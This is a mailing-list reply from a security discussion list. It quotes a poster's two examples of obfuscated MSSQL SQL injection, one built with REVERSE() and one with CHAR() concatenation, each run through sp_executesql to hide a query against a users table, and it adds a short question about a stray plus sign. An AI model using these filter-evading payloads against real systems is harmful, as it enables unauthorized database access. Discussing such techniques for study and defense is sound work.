On 8 June 2012 03:43, Pat <[email protected]> wrote:
> Hi all,
>
> I came from a developer background and found myself in business development
> so in order to get my nerd on  I started a blog as I do have the odd brain
> fart.
>
> Thought id share one of my favourites as I have seen a few posts out there
> saying obfuscation of SQL injection is not possible...
>
>
> Example 1
> --MSSQL
>
> --SELECT * FROM USERS;
>
> 'DECLARE @myvar nchar(50)= REVERSE(';sresu morf * tceles'); exec
> sp_executesql @myvar ;--
>
> Example 2
> --MSSQL
>
> --SELECT * FROM USERS;
>
> DECLARE @myvar nchar(50)= + CHAR(83)+ CHAR(69)+ CHAR(76)+ CHAR(69)+
> CHAR(67)+ CHAR(84)+ CHAR(32)+ CHAR(42)+ CHAR(32)+ CHAR(70)+ CHAR(114)+
> CHAR(111)+ CHAR(109)+ CHAR(32)+ CHAR(85)+ CHAR(83)+ CHAR(69)+ CHAR(82)+
> CHAR(83); exec sp_executesql @myvar

Is there a rogue + after the = in this example?

Robin

> For a script to generate example 2 see
> http://stolenpackets.net/?p=11
>
>
>
> Regards,
> Pat
>
> _______________________________________________
> Pauldotcom mailing list
> [email protected]
> http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
> Main Web Site: http://pauldotcom.com
_______________________________________________
Pauldotcom mailing list
[email protected]
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

Reply via email to